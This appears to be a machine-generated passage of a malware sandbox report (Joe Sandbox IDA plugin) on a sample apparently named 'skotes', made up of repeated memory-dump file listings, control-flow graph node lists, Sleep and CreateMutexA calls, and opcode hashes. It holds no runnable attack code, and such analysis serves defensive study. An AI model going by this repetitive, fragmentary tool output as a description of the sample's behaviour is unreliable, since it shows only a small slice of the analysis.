                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742046018.000000000109E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742073517.00000000010A0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742101257.00000000010A9000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742129433.00000000010AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742148924.00000000010AC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742170855.00000000010B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742194060.00000000010C5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742213925.00000000010C7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742231945.00000000010D0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742249608.00000000010D9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742270250.00000000010EE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742291913.00000000010F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742310037.00000000010FA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742328703.00000000010FC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742345359.00000000010FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742364081.0000000001102000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742385114.0000000001103000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742403557.0000000001109000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742420325.000000000110A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742437683.000000000110D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742456555.0000000001115000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742475321.0000000001117000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742493214.0000000001118000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742511049.000000000111D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742527861.000000000111E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742545139.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742585813.000000000112E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742603605.000000000112F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742621245.0000000001137000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742638056.000000000113A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742675407.000000000114A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742693428.000000000114D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743293929.000000000114E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743372583.0000000001150000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743425236.000000000116F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743442942.0000000001170000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743442942.000000000117A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744551425.00000000011A8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744668521.00000000011A9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744956223.00000000011AA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744983330.00000000011AE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1745005449.00000000011B0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1745061256.00000000011BE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1745080109.00000000011BF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_ea0000_skotes.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                                              • Opcode ID: c556f7626b20aabda5fa021ebc12cf7bb5c49db840355fbfdc6df24989817f4c
                                                                                                                                                                                                                                                              • Instruction ID: 56f1c603a6cafb6165b6edc079b0df69031a513506f484ff12957fec4ea98693
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c556f7626b20aabda5fa021ebc12cf7bb5c49db840355fbfdc6df24989817f4c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BA310B31B043048BEB18DBB8DC997ADB7A6EBCA314F285628E014BF3D5D7359981C716

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 202 eaa682-eaa6a2 206 eaa6d0-eaa6ec 202->206 207 eaa6a4-eaa6b0 202->207 210 eaa71a-eaa739 206->210 211 eaa6ee-eaa6fa 206->211 208 eaa6b2-eaa6c0 207->208 209 eaa6c6-eaa6cd call ebd663 207->209 208->209 212 eaa949 208->212 209->206 216 eaa73b-eaa747 210->216 217 eaa767-eaa916 call eb80c0 210->217 214 eaa6fc-eaa70a 211->214 215 eaa710-eaa717 call ebd663 211->215 218 eaa94e 212->218 219 eaa949 call ed6c6a 212->219 214->212 214->215 215->210 223 eaa749-eaa757 216->223 224 eaa75d-eaa764 call ebd663 216->224 226 eaa953-eaa994 Sleep CreateMutexA 218->226 227 eaa94e call ed6c6a 218->227 219->218 223->212 223->224 224->217 234 eaa996-eaa998 226->234 235 eaa9a7-eaa9a8 226->235 227->226 234->235 236 eaa99a-eaa9a5 234->236 236->235
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00EAA963
                                                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00F03254), ref: 00EAA981
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.1741470474.0000000000EA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741454272.0000000000EA0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741470474.0000000000F02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741528812.0000000000F09000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741545129.0000000000F0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741563886.0000000000F15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741652929.0000000000F16000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741682720.0000000000F17000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741822098.0000000001074000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741858006.0000000001076000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741903885.0000000001088000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741924804.000000000108A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741949219.000000000108B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741949219.0000000001096000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741997744.0000000001098000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742023104.000000000109D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742046018.000000000109E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742073517.00000000010A0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742101257.00000000010A9000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742129433.00000000010AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742148924.00000000010AC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742170855.00000000010B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742194060.00000000010C5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742213925.00000000010C7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742231945.00000000010D0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742249608.00000000010D9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742270250.00000000010EE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742291913.00000000010F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742310037.00000000010FA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742328703.00000000010FC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742345359.00000000010FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742364081.0000000001102000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742385114.0000000001103000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742403557.0000000001109000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742420325.000000000110A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742437683.000000000110D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742456555.0000000001115000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742475321.0000000001117000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742493214.0000000001118000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742511049.000000000111D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742527861.000000000111E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742545139.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742585813.000000000112E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742603605.000000000112F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742621245.0000000001137000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742638056.000000000113A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742675407.000000000114A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742693428.000000000114D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743293929.000000000114E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743372583.0000000001150000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743425236.000000000116F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743442942.0000000001170000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743442942.000000000117A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744551425.00000000011A8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744668521.00000000011A9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744956223.00000000011AA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744983330.00000000011AE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1745005449.00000000011B0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1745061256.00000000011BE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1745080109.00000000011BF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_ea0000_skotes.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                                              • Opcode ID: 7b68cf0cfbe7cf1939def036262973efba3ec04d42a710e0a4c329818e9080d2
                                                                                                                                                                                                                                                              • Instruction ID: daae8dd2f438c0f2923923bf6724682cabdce883fc4992491f7de12917847d23
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b68cf0cfbe7cf1939def036262973efba3ec04d42a710e0a4c329818e9080d2
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44312A317043048BEB18DB78DC897AEB7A2DBCA310F289229E014BB3D5D7356980C752

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 238 ea9adc-ea9ae8 239 ea9aea-ea9af8 238->239 240 ea9afe-ea9d91 call ebd663 call eb7a00 call ea5c10 call ea8b30 call eb8220 call eb7a00 call ea5c10 call ea8b30 call eb8220 238->240 239->240 241 eaa917 239->241 243 eaa953-eaa994 Sleep CreateMutexA 241->243 244 eaa917 call ed6c6a 241->244 250 eaa996-eaa998 243->250 251 eaa9a7-eaa9a8 243->251 244->243 250->251 253 eaa99a-eaa9a5 250->253 253->251
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00EAA963
                                                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00F03254), ref: 00EAA981
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.1741470474.0000000000EA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741454272.0000000000EA0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741470474.0000000000F02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741528812.0000000000F09000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741545129.0000000000F0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741563886.0000000000F15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741652929.0000000000F16000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741682720.0000000000F17000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741822098.0000000001074000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741858006.0000000001076000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741903885.0000000001088000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741924804.000000000108A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741949219.000000000108B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741949219.0000000001096000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741997744.0000000001098000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742023104.000000000109D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742046018.000000000109E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742073517.00000000010A0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742101257.00000000010A9000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742129433.00000000010AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742148924.00000000010AC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742170855.00000000010B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742194060.00000000010C5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742213925.00000000010C7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742231945.00000000010D0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742249608.00000000010D9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742270250.00000000010EE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742291913.00000000010F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742310037.00000000010FA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742328703.00000000010FC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742345359.00000000010FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742364081.0000000001102000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742385114.0000000001103000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742403557.0000000001109000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742420325.000000000110A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742437683.000000000110D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742456555.0000000001115000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742475321.0000000001117000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742493214.0000000001118000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742511049.000000000111D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742527861.000000000111E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742545139.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742585813.000000000112E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742603605.000000000112F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742621245.0000000001137000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742638056.000000000113A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742675407.000000000114A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742693428.000000000114D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743293929.000000000114E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743372583.0000000001150000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743425236.000000000116F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743442942.0000000001170000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743442942.000000000117A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744551425.00000000011A8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744668521.00000000011A9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744956223.00000000011AA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744983330.00000000011AE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1745005449.00000000011B0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1745061256.00000000011BE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1745080109.00000000011BF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_ea0000_skotes.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                                              • Opcode ID: 00739dd906c6f7ced0fa5a332d3a23a6d72c4e6ec1dae3d1691db6bfcd0587a6
                                                                                                                                                                                                                                                              • Instruction ID: 9a51be335e70643f7290f022a8ed78d8a8b0b0ef03a4b78fd4f2980fad61543c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 00739dd906c6f7ced0fa5a332d3a23a6d72c4e6ec1dae3d1691db6bfcd0587a6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B3212C317043009BEB189F68EC9976DF7A5EBCA310F245229E418EB3D6D7756981C711

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 306 eaa856-eaa86e 307 eaa89c-eaa89e 306->307 308 eaa870-eaa87c 306->308 309 eaa8a9-eaa8b1 call ea7d30 307->309 310 eaa8a0-eaa8a7 307->310 311 eaa87e-eaa88c 308->311 312 eaa892-eaa899 call ebd663 308->312 323 eaa8b3-eaa8bb call ea7d30 309->323 324 eaa8e4-eaa8e6 309->324 313 eaa8eb-eaa916 call eb80c0 310->313 311->312 315 eaa94e 311->315 312->307 319 eaa953-eaa987 Sleep CreateMutexA 315->319 320 eaa94e call ed6c6a 315->320 326 eaa98e-eaa994 319->326 320->319 323->324 330 eaa8bd-eaa8c5 call ea7d30 323->330 324->313 328 eaa996-eaa998 326->328 329 eaa9a7-eaa9a8 326->329 328->329 331 eaa99a-eaa9a5 328->331 330->324 335 eaa8c7-eaa8cf call ea7d30 330->335 331->329 335->324 338 eaa8d1-eaa8d9 call ea7d30 335->338 338->324 341 eaa8db-eaa8e2 338->341 341->313
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00EAA963
                                                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00F03254), ref: 00EAA981
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.1741470474.0000000000EA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741454272.0000000000EA0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741470474.0000000000F02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741528812.0000000000F09000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741545129.0000000000F0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741563886.0000000000F15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741652929.0000000000F16000.00000040.00000001.01000000.00000008.sdmpDownload File
